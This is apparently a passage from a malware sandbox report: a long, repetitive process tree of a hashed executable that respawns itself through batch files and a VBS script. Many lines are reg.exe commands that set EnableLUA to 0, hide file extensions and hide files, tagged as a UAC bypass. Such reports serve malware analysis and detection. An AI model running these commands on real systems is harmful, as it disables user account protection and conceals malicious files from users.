C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
289⤵
PID:3244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
290⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
291⤵
PID:6012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
292⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
293⤵
PID:2588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
292⤵
PID:3304

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
292⤵
PID:3368

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
292⤵
PID:584

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
290⤵
- Modifies visibility of file extensions in Explorer
PID:5072

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
290⤵
PID:2384

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
290⤵
- UAC bypass
PID:1428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VwIsYQoM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
290⤵
PID:5620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
291⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
288⤵
- Modifies visibility of file extensions in Explorer
PID:1556

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
288⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
288⤵
PID:3028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kSMYYIkY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
288⤵
PID:4732

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
289⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
286⤵
- Modifies visibility of file extensions in Explorer
PID:2304

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
286⤵
- Modifies registry key
PID:5828

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
286⤵
- UAC bypass
- Modifies registry key
PID:324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOQYEokM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
286⤵
PID:5568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
287⤵
PID:5824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
284⤵
- Modifies visibility of file extensions in Explorer
PID:1644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
284⤵
PID:6052

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
285⤵
PID:4008

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
284⤵
- Modifies registry key
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eoIIMwYk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
284⤵
PID:5476

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
285⤵
PID:1124

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
282⤵
PID:4932

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
282⤵
PID:340

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
282⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BGIUkwcA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
282⤵
PID:2192

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
283⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
280⤵
- Modifies visibility of file extensions in Explorer
PID:3872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
280⤵
PID:3764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
280⤵
PID:5200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TKsYwoco.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
280⤵
PID:3108

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
281⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
278⤵
PID:2396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
278⤵
PID:2708

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
278⤵
- UAC bypass
- Modifies registry key
PID:2616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIQIIIYU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
278⤵
PID:1772

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
279⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
276⤵
- Modifies visibility of file extensions in Explorer
PID:3008

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
276⤵
PID:5008

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
276⤵
PID:6048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zQUkcIAQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
276⤵
PID:4372

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
277⤵
PID:1840

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
274⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
274⤵
PID:2888

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
274⤵
PID:3112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bSwAoksI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
274⤵
PID:4800

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
275⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
272⤵
PID:796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
272⤵
PID:4008

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
272⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiMsgoUg.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
272⤵
PID:3460

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
273⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
270⤵
PID:5972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
270⤵
- Modifies registry key
PID:648

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
270⤵
- UAC bypass
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csQYwEkU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
270⤵
PID:3824

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
271⤵
PID:2836

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
268⤵
PID:2756

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
268⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
268⤵
- UAC bypass
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uIQMAccc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
268⤵
PID:1836

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
269⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
266⤵
PID:2244

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
266⤵
PID:5644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
266⤵
PID:2484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yIkokIMI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
266⤵
PID:1456

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
267⤵
PID:2684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
264⤵
- Modifies visibility of file extensions in Explorer
PID:3404

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
264⤵
PID:5736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
264⤵
PID:6012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PQsYAkcE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
264⤵
PID:5056

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
265⤵
PID:4116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
262⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
262⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
262⤵
- UAC bypass
PID:1660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zSwAUwcc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
262⤵
PID:1516

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
263⤵
PID:3912

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
260⤵
PID:1408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
260⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
260⤵
- UAC bypass
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rOEQIcog.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
260⤵
PID:3972

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
261⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
258⤵
PID:2140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
258⤵
PID:2300

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
258⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yaEwsgUM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
258⤵
PID:1620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
259⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
256⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
256⤵
PID:5244

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
256⤵
- UAC bypass
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KqwcQQkE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
256⤵
PID:648

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
257⤵
PID:5660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
254⤵
- Modifies visibility of file extensions in Explorer
PID:3300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
254⤵
PID:5780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
254⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KyIYcAwU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
254⤵
PID:2948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
255⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
252⤵
PID:2096

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
252⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
252⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scAQsUUc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
252⤵
PID:5232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
253⤵
PID:3612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
250⤵
- Modifies visibility of file extensions in Explorer
PID:3156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
250⤵
PID:6048

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
250⤵
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zGAMYkcc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
250⤵
PID:5620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
251⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
248⤵
- Modifies visibility of file extensions in Explorer
PID:2116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
248⤵
PID:132

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
248⤵
- UAC bypass
PID:3508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZGUcQcwo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
248⤵
PID:2000

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
249⤵
PID:432

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
246⤵
- Modifies registry key
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
246⤵
PID:4020

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
246⤵
- UAC bypass
PID:3348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LaUggQYk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
246⤵
PID:1564

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
247⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
244⤵
PID:2300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
244⤵
PID:2776

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
244⤵
- UAC bypass
PID:6068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZuAwEcAU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
244⤵
PID:8

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
245⤵
PID:5484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
242⤵
- Modifies visibility of file extensions in Explorer
PID:5708

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
242⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
242⤵
- UAC bypass
- Modifies registry key
PID:4220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uQcgwAQw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
242⤵
PID:2568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
243⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
240⤵
- Modifies visibility of file extensions in Explorer
PID:820

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
240⤵
PID:5212

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
240⤵
PID:940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UCoQokck.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
240⤵
PID:2484

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
241⤵
PID:3504

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
238⤵
- Modifies visibility of file extensions in Explorer
PID:1868

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
238⤵
PID:1404

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
238⤵
PID:3364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KmMYAkoI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
238⤵
PID:1560

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
239⤵
PID:5640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
236⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
236⤵
PID:5184

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
236⤵
- UAC bypass
PID:4752

C:\Windows\SysWOW64\cmd.exe
